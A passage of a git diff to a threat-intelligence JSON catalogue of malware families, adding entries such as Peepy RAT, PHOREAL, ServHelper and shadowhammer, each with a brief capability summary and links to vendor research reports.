"https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services" + "http://blogs.360.cn/post/analysis-of-apt-c-37.html" ], "synonyms": [ "Bladabindi" @@ -10865,10 +12535,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", + "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded", + "https://bitbucket.org/daniel_plohmann/idapatchwork", "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", - "https://www.cert.pl/en/news/single/nymaim-revisited/", - "https://bitbucket.org/daniel_plohmann/idapatchwork" + "https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim" ], "synonyms": [ "nymain" @@ -11091,6 +12763,19 @@ "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", "value": "OpBlockBuster" }, + { + "description": "FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "092262b0-c631-400d-9f38-017cd59a14fd", + "value": "ORANGEADE" + }, { "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.", "meta": { @@ -11109,10 +12794,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", + "https://orcustechnologies.com/", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", + "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", - "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", - "https://orcustechnologies.com/" + "https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/" ], "synonyms": [], "type": [] @@ -11134,6 +12821,19 @@ "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", "value": "Ordinypt" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor", + "https://www.welivesecurity.com/wp-content/uploads/2018/08/Eset-Turla-Outlook-Backdoor.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "10a521e4-b3b9-4feb-afce-081531063e7b", + "value": "Outlook Backdoor" + }, { "description": "", "meta": { @@ -11246,6 +12946,19 @@ "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", "value": "parasite_http" }, + { + "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.peepy_rat", + "https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "49321579-9dfe-45c6-80df-79467e4af65d", + "value": "Peepy RAT" + }, { "description": "", "meta": { @@ -11334,6 +13047,21 @@ "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", "value": "Philadephia Ransom" }, + { + "description": " Phoreal is a very simple backdoor that is capable of creating a reverse shell, performing simple file I/O and top-level window enumeration. It communicates to a list of four preconfigured C2 servers via ICMP on port 53", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phoreal", + "https://www.cylance.com/content/dam/cylance-web/en-us/resources/knowledge-center/resource-library/reports/SpyRATsofOceanLotusMalwareWhitePaper.pdf" + ], + "synonyms": [ + "Rizzo" + ], + "type": [] + }, + "uuid": "3aa6fd62-9b91-4136-af0e-08af7962ba4b", + "value": "PHOREAL" + }, { "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { @@ -11341,8 +13069,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", - "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/", - "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows" + "https://www.crowdstrike.com/blog/pinchy-spider-adopts-big-game-hunting/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" ], "synonyms": [ "Trik" @@ -11519,20 +13248,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", + "https://threatrecon.nshc.net/2019/03/19/sectorm04-targeting-singapore-custom-malware-analysis/", "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", "https://community.rsa.com/thread/185439", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", - "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", - "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", - "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf" ], @@ -11566,6 +13296,7 @@ "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html", "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "http://blogs.360.cn/post/APT_C_01_en.html", @@ -11665,6 +13396,19 @@ "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", "value": "poscardstealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poshc2", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0215eae2-0ab7-4567-8ac6-1be36a7893a6", + "value": "PoshC2" + }, { "description": "", "meta": { @@ -11691,6 +13435,19 @@ "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", "value": "PowerDuke" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerkatz", + "https://blog.yoroi.company/research/the-arsenal-behind-the-australian-parliament-hack/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9e3aaf82-268b-47d1-b953-3799c5e1f475", + "value": "powerkatz" + }, { "description": "", "meta": { @@ -11705,11 +13462,13 @@ "value": "PowerPool" }, { - "description": "", + "description": "A malware of the gozi group, developed on the base of isfb. It uses Office Macros and PowerShell in documents distributed in e-mail messages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", - "https://lokalhost.pl/gozi_tree.txt" + "https://lokalhost.pl/gozi_tree.txt", + "https://www.thesecuritybuddy.com/malware-prevention/what-is-powersniff-malware/", + "https://unit42.paloaltonetworks.com/powersniff-malware-used-in-macro-based-attacks/" ], "synonyms": [], "type": [] @@ -11724,6 +13483,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", + "https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" ], "synonyms": [], @@ -11750,6 +13510,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.predator", + "https://securelist.com/a-predatory-tale/89779", "https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/" ], "synonyms": [], @@ -11805,6 +13566,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/", "https://twitter.com/mesa_matt/status/1035211747957923840" ], "synonyms": [], @@ -11833,7 +13595,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", - "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html", + "https://cert.gov.ua/news/42", + "https://blog.threatstop.com/russian-apt-gamaredon-group", + "https://cert.gov.ua/news/46" ], "synonyms": [], "type": [] @@ -11870,20 +13636,22 @@ "value": "Punkey POS" }, { - "description": "", + "description": "Pupy is an open-source, cross-platform RAT and post-exploitation framework mainly written in python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure python, powershell and APK. Most of the loaders bundle an embedded python runtime, python library modules in source/compiled/native forms as well as a flexible configuration. They bootstrap a python runtime environment mostly in-memory for the later stages of pupy to run in. Pupy can communicate using various transports, migrate into processes, load remote python code, python packages and python C-extensions from memory.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", - "https://github.com/n1nj4sec/pupy" + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://github.com/n1nj4sec/pupy", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" ], "synonyms": [], "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy" + "value": "pupy (Windows)" }, { "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", @@ -11961,8 +13729,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", - "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", + "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", + "https://blog.talosintelligence.com/2019/01/pylocky-unlocked-cisco-talos-releases.html", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" ], "synonyms": [ @@ -12009,9 +13778,10 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qakbot", "https://www.johannesbader.ch/2016/02/the-dga-of-qakbot/", - "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_qakbot_in_detail.pdf", + "https://securityintelligence.com/qakbot-banking-trojan-causes-massive-active-directory-lockouts/", "http://contagiodump.blogspot.com/2010/11/template.html", + "https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/", "https://media.scmagazine.com/documents/225/bae_qbot_report_56053.pdf", "https://www.cylance.com/en_us/blog/threat-spotlight-the-return-of-qakbot-malware.html", "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Karve-etal.pdf", @@ -12078,15 +13848,17 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.quasar_rat", "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/", + "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://github.com/quasar/QuasarRAT/tree/master/Client", "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf?platform=hootsuite", "https://ti.360.net/blog/articles/analysis-of-apt-c-09-target-china/", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://twitter.com/malwrhunterteam/status/789153556255342596", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-downeks-and-quasar-rat-used-in-recent-targeted-attacks-against-governments" + "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/" ], "synonyms": [], "type": [] @@ -12094,6 +13866,19 @@ "uuid": "05252643-093b-4070-b62f-d5836683a9fa", "value": "Quasar RAT" }, + { + "description": "Qulab is an AutoIT Malware focusing on stealing & clipping content from victim's machines.\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.qulab", + "https://fumik0.com/2019/03/25/lets-play-with-qulab-an-exotic-malware-developed-in-autoit/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "728ce877-6f1d-4719-81df-387a8e395695", + "value": "Qulab" + }, { "description": "", "meta": { @@ -12151,7 +13936,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo", - "https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor" + "https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html" ], "synonyms": [ "brebsd" @@ -12279,6 +14064,20 @@ "uuid": "bc1fc21d-80c0-4629-bb18-d5ae1df2a431", "value": "RapidStealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rarog", + "https://unit42.paloaltonetworks.com/unit42-smoking-rarog-mining-trojan/", + "https://tracker.fumik0.com/malware/Rarog" + ], + "synonyms": [], + "type": [] + }, + "uuid": "184e5134-473c-4a01-9a8b-f4776f178fc9", + "value": "Rarog" + }, { "description": "", "meta": { @@ -12325,6 +14124,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rcs", + "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-hacking-team-hacked-team/", "https://www.f-secure.com/documents/996508/1030745/callisto-group", "https://www.welivesecurity.com/2018/03/09/new-traces-hacking-team-wild/" ], @@ -12392,15 +14192,29 @@ "uuid": "6be9eee4-ee99-4ad6-bee3-2365d7b37a88", "value": "RedAlpha" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redaman", + "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "97dab1f9-724a-4560-9c70-90c0d1d7fa4b", + "value": "Redaman" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redleaves", - "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", "http://blog.macnica.net/blog/2017/12/post-8c22.html", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "http://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://github.com/nccgroup/Cyber-Defence/tree/master/Technical%20Notes/Red%20Leaves", "https://www.jpcert.or.jp/magazine/acreport-redleaves.html" ], @@ -12484,6 +14298,7 @@ "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "http://malware-traffic-analysis.net/2017/12/22/index.html", + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", @@ -12502,7 +14317,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remexi", "https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions", - "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf" + "http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf", + "https://securelist.com/chafer-used-remexi-malware/89538/" ], "synonyms": [], "type": [] @@ -12527,7 +14343,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.remy", + "https://threatvector.cylance.com/en_us/home/report-oceanlotus-apt-group-leveraging-steganography.html" ], "synonyms": [], "type": [] @@ -12566,11 +14383,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.retefe", + "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/", "https://github.com/cocaman/retefe", - "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga", "https://www.govcert.admin.ch/blog/35/reversing-retefe", - "https://threatpost.com/eternalblue-exploit-used-in-retefe-banking-trojan-campaign/128103/" + "https://researchcenter.paloaltonetworks.com/2015/08/retefe-banking-trojan-targets-sweden-switzerland-and-japan/", + "https://github.com/Tomasuh/retefe-unpacker" ], "synonyms": [ "Tsukuba", @@ -12612,6 +14430,19 @@ "uuid": "daddd1dc-c415-4970-89ee-526ee8de2ec1", "value": "RGDoor" }, + { + "description": "Rietspoof is malware that mainly acts as a dropper and downloader, however, it also sports bot capabilities and appears to be in active development.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rietspoof", + "https://blog.avast.com/rietspoof-malware-increases-activity" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ec67123a-c3bc-4f46-b9f3-569c19e224ca", + "value": "Rietspoof" + }, { "description": "", "meta": { @@ -12664,6 +14495,35 @@ "uuid": "a85b0619-ed8e-4324-8603-af211d682dac", "value": "Ripper ATM" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun", + "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-sharpshooter.pdf", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/operation-sharpshooter-targets-global-defense-critical-infrastructure/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "148a7078-3a38-4974-8990-9d5881f8267b", + "value": "Rising Sun" + }, + { + "description": "CyberInt states that Remote Manipulator System (RMS) is a legitimate tool developed by Russian organization TektonIT and has been observed in campaigns conducted by TA505 as well as numerous smaller campaigns likely attributable to other, disparate, threat actors. In addition to the availability of commercial licenses, the tool is free for non-commercial use and supports the remote administration of both Microsoft Windows and Android devices.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rms", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf" + ], + "synonyms": [ + "Remote Manipulator System" + ], + "type": [] + }, + "uuid": "94339b04-9332-4691-b820-5021368f1d3a", + "value": "RMS" + }, { "description": "", "meta": { @@ -12704,6 +14564,20 @@ "uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf", "value": "Rofin" }, + { + "description": "A .NET variant of ps1.roguerobin", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.roguerobin", + "https://unit42.paloaltonetworks.com/darkhydrus-delivers-new-trojan-that-can-use-google-drive-for-c2-communications/", + "https://ti.360.net/blog/articles/latest-target-attack-of-darkhydruns-group-against-middle-east-en/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "25b08d2e-f803-4520-9518-4d95ce9f6ed4", + "value": "RogueRobinNET" + }, { "description": "", "meta": { @@ -12789,6 +14663,23 @@ "uuid": "8a4eb0ca-7175-4e69-b8d2-fd7a724de67b", "value": "Roseam" }, + { + "description": "Ransomware that was discovered over the last months of 2016 and likely based on Gomasom, another ransomware family.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.rotorcrypt", + "https://id-ransomware.blogspot.com/2016/10/rotorcrypt-ransomware.html", + "https://www.bleepingcomputer.com/forums/t/629699/rotorcrypt-rotocrypt-ransomware-support-topic-tar-c400-c300-granit/" + ], + "synonyms": [ + "RotoCrypt", + "Rotor" + ], + "type": [] + }, + "uuid": "f20ef9a8-6ffc-4ef2-98ba-44f6b2eab966", + "value": "RotorCrypt" + }, { "description": "", "meta": { @@ -12972,7 +14863,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk", - "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/" + "https://www.cybereason.com/blog/triple-threat-emotet-deploys-trickbot-to-steal-data-spread-ryuk-ransomware", + "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/", + "https://www.latimes.com/local/lanow/la-me-ln-times-delivery-disruption-20181229-story.html", + "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/" ], "synonyms": [], "type": [] @@ -13035,7 +14932,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sality", - "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf" + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/sality_peer_to_peer_viral_network.pdf", + "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P18-Kleissner-Sality.pdf" ], "synonyms": [], "type": [] @@ -13076,6 +14974,19 @@ "uuid": "34c6504b-e947-49d8-a963-62b7594b7ef9", "value": "Sanny" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sappycache", + "https://www.fireeye.com/blog/threat-research/2019/03/winrar-zero-day-abused-in-multiple-campaigns.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "056eca1f-4195-48c3-81d8-ed554dd1de20", + "value": "SappyCache" + }, { "description": "", "meta": { @@ -13118,11 +15029,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.satan", + "https://www.sangfor.com/source/blog-network-security/1094.html", "https://www.alienvault.com/blogs/labs-research/satan-ransomware-spawns-new-methods-to-spread", + "https://cyware.com/news/new-satan-ransomware-variant-lucky-exposes-10-server-side-vulnerabilities-070afbd2", "https://www.bleepingcomputer.com/news/security/new-satan-ransomware-available-through-a-ransomware-as-a-service-/", - "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html" + "https://bartblaze.blogspot.com/2018/04/satan-ransomware-adds-eternalblue.html", + "http://blog.nsfocusglobal.com/categories/trend-analysis/satan-variant-analysis-handling-guide/", + "https://www.bleepingcomputer.com/news/security/dbger-ransomware-uses-eternalblue-and-mimikatz-to-spread-across-networks/" + ], + "synonyms": [ + "DBGer", + "Lucky Ransomware" ], - "synonyms": [], "type": [] }, "uuid": "5639f7db-ab70-4b86-8a2f-9c4e3927ba91", @@ -13159,7 +15077,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.scanpos", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", + "https://securitykitten.github.io/2016/11/15/scanpos.html", "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware" ], "synonyms": [], @@ -13322,6 +15240,40 @@ "uuid": "0d4ca924-7e7e-4385-b14d-f504b4d206e5", "value": "Serpico" }, + { + "description": "ServHelper is written in Delphi and according to ProofPoint best classified as a backdoor.\r\n\r\nProofPoint noticed two distinct variant - \"tunnel\" and \"downloader\" (citation):\r\n\"The 'tunnel' variant has more features and focuses on setting up reverse SSH tunnels to allow the threat actor to access the infected host via Remote Desktop Protocol (RDP). Once ServHelper establishes remote desktop access, the malware contains functionality for the threat actor to 'hijack' legitimate user accounts or their web browser profiles and use them as they see fit. The 'downloader' variant is stripped of the tunneling and hijacking functionality and is used as a basic downloader.\"\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.servhelper", + "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505", + "https://e.cyberint.com/hubfs/Report%20Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors%20Tools/CyberInt_Legit%20Remote%20Access%20Tools%20Turn%20Into%20Threat%20Actors'%20Tools_Report.pdf", + "https://www.deepinstinct.com/2019/04/02/new-servhelper-variant-employs-excel-4-0-macro-to-drop-signed-payload/", + "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", + "https://www.cybereason.com/blog/threat-actor-ta505-targets-financial-enterprises-using-lolbins-and-a-new-backdoor-malware" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cebfa7af-8c31-4dda-8373-82893c7f43f4", + "value": "ServHelper" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.shadowhammer", + "https://skylightcyber.com/2019/03/28/unleash-the-hash-shadowhammer-mac-list/", + "https://countercept.com/blog/analysis-shadowhammer-asus-attack-first-stage-payload/", + "https://securelist.com/operation-shadowhammer/89992/", + "https://blog.reversinglabs.com/blog/forging-the-shadowhammer", + "https://www.vkremez.com/2019/03/lets-learn-dissecting-operation.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "51728278-a95c-45a5-9ae0-9897d41d0efb", + "value": "shadowhammer" + }, { "description": "", "meta": { @@ -13436,6 +15388,19 @@ "uuid": "67fc358f-da6a-4f01-be23-44bc97319127", "value": "Shim RAT" }, + { + "description": "SHIPSHAPE is malware developed by 